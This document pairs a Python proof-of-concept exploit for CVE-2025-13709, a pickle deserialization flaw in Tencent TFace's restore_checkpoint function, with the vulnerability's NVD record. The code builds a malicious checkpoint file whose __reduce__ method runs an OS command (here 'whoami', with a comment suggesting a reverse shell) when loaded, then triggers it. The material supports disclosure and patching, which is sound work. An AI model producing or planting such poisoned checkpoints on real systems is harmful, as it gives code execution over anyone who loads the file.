CVE-2025-13709

# CVE-2025-13709 PoC - Tencent TFace restore_checkpoint Deserialization RCE # This PoC demonstrates the deserialization vulnerability in TFace's restore_checkpoint function import pickle import os class Exploit: def __reduce__(self): # Execute arbitrary command - reverse shell or whoami for verification cmd = "whoami" return (os.system, (cmd,)) def generate_malicious_checkpoint(): """ Generate a malicious checkpoint file that exploits the deserialization vulnerability """ # Create malicious payload exploit = Exploit() malicious_data = pickle.dumps(exploit) # Save as checkpoint file with open('malicious_checkpoint.pkl', 'wb') as f: f.write(malicious_data) print("[+] Malicious checkpoint file created: malicious_checkpoint.pkl") print("[+] Payload: os.system('whoami')") return malicious_data def simulate_vulnerable_code(serialized_data): """ Simulate the vulnerable restore_checkpoint function behavior """ print("[*] Simulating restore_checkpoint with untrusted data...") try: # VULNERABLE: No input validation before deserialization data = pickle.loads(serialized_data) print("[+] Data deserialized successfully (VULNERABLE!)") return data except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-13709 PoC - TFace Deserialization RCE") print("=" * 60) # Generate malicious checkpoint malicious_data = generate_malicious_checkpoint() # Demonstrate exploitation print("\n[*] Triggering vulnerability...") simulate_vulnerable_code(malicious_data)

{"cve": {"id": "CVE-2025-13709", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.577", "lastModified": "2026-01-12T17:37:20.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent TFace restore_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the restore_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27185."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tencent:tface:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-09-29", "matchCriteriaId": "469A2034-B51B-4F89-84CF-2E41DC663D76"}]}]}], "references": [{"url": "https://github.com/Tencent/TFace/commit/7b2eed297d43dcdd1e3d45bfdfc950478e3af5d9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1036/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}